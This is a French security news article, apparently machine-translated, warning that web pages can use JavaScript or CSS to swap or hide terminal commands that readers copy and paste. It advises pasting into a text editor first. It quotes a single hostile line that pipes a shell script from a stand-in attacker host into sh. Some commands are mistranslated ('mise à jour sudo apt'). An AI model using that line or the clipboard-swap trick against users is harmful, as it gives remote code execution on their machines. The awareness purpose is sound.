Méfiez-vous de cette astuce pour tromper quiconque copie et colle du code sur le Web – Antivirus & Sécurité –

Les attaques contre les ordinateurs et les systèmes sont de plus en plus sophistiquées, mais même des procédures simples peuvent présenter un risque, même s’il s’agit d’un processus inoffensif de copier et coller. Il est possible de mettre des commandes cachées sur des lignes apparemment innocentes, et cela peut ouvertement compromettre la sécurité de votre machine.

Copier du code et le coller directement dans le terminal est une mauvaise idée (Image : Kevin Ku/Unsplash)

La stratégie est simple : mettre du code commun sur une page d’instructions ou de tutoriels, mais se cacher derrière une commande qui donne accès au système lorsqu’elle est collée directement dans un terminal. O Ordinateur qui bipe a montré deux façons dont cela est possible.

Contents

JavaScript échange le texte copié

Une preuve de concept de Gabriel Friedlander, fondateur de la plateforme de formation à la sécurité Wizer, montre comment cela est possible.

Sur la page de formation, il a mis une simple commande Linux :

mise à jour sudo apt

Lors du copier-coller de la commande, le code qui apparaît est assez différent

curl http://domaine-attaquant:8000/shell.sh | sh

De plus, le code collé est déjà accompagné d’un saut de ligne, ce qui le fait exécuter directement par le terminal, au cas où il n’y aurait pas de verrou.

L’astuce dans les coulisses est un petit code JavaScript, qui insère un autre texte dans le presse-papiers lors de la copie de l’extrait sélectionné.

CSS rend l’extrait de code invisible

JavaScript n’est pas le seul outil qui peut être utilisé pour masquer le code malveillant. Il est également possible de le faire en utilisant CSS.

L’utilisateur de Reddit SwallowYourDreams a donné une démo. Sur la page, deux commandes simples semblent être copiées.

echo “Je ne suis qu’une commande amicale”

echo “Copiez et lancez-moi.”

Lors du collage, cependant, un troisième apparaît.

echo “Je ne suis qu’une commande amicale”

echo “Haha, vous venez d’exécuter une mauvaise commande. Votre système est rekt maintenant.

echo “Copiez et lancez-moi.”

Comment cette troisième commande est-elle apparue ? Il était là tout le temps, vous ne l’avez tout simplement pas vu. Avec deux changements de mise en forme, cette ligne de texte devient blanche et de taille nulle, mais reste sélectionnable par le curseur de la souris.

Comment éviter

Le conseil est très simple : ne collez jamais de code copié depuis Internet directement dans le terminal, quelle que soit la fiabilité du site Web.

Nous savons que les codes sont souvent compliqués et les retaper est une corvée. Pour éviter les mauvaises surprises, la meilleure chose à faire est de les coller d’abord dans un éditeur de texte – même le bon vieux Bloc-notes fera l’affaire.

Si tout va bien, copiez-le et collez-le à nouveau, cette fois dans le terminal.

Gaston Alexandre

En tant que travailleur indépendant, j’ai décidé de me lancer dans la rédaction d’articles basée sur le buzz international. Je traite ainsi différents sujets, et particulièrement ceux qui ont suscité un énorme engouement dans la société mondiale. J’écris ainsi des articles concernant les thématiques à fort caractère, c’est-à-dire qui créent un véritable impact émotionnel chez le lecteur. Le nombre d’articles que j’écris est variable au quotidien. L’objectif étant de fournir le maximum d’informations pertinentes du jour, vous pouvez alors découvrir de nombreuses publications d’une douzaine de lignes par article.
Bouton retour en haut de la page